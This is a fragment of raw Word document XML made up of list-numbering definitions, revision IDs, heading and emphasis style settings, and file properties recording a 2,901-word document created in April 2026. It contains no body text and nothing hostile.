  <w:num w:numId="31" w16cid:durableId="1499344463">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="187524382">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1858347177">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="427236204">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1419062607">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1011645848">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="2052457925">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1045712790">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="837428753">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="542450325">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="646907483">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="1855461943">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="466438254">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1858808596">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="1988439431">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1492990988">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="802431926">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="766924693">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="186522796">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="1470512577">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1895920248">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="203221660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1DB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157C"/>
    <w:rsid w:val="00A67CE2"/>
    <w:rsid w:val="00A878A6"/>
    <w:rsid w:val="00A90A9E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1DB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6161"/>
    <w:rsid w:val="00EB69DE"/>
    <w:rsid w:val="00ED7608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63301"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{14C6107D-2D08-4D21-9491-7020E4DFE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FA2"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos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4485"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:textAlignment w:val="baseline"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:kern w:val="2"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="27"/>
      <w:lang w:eastAsia="en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68E0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b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1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1D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1D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1D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1D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485"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsia="Times New Roman" w:hAnsi="Aptos" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:sz w:val="40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C68E0"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Aptos" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="32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1DB"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="B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1DB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1DB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1DB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1DB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1D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1D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311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1DB"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF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C31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1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1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1DB"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF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311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2901</Words>
  <Characters>16540</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>137</Lines>
  <Paragraphs>38</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>19403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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-05T15:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-05T15:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>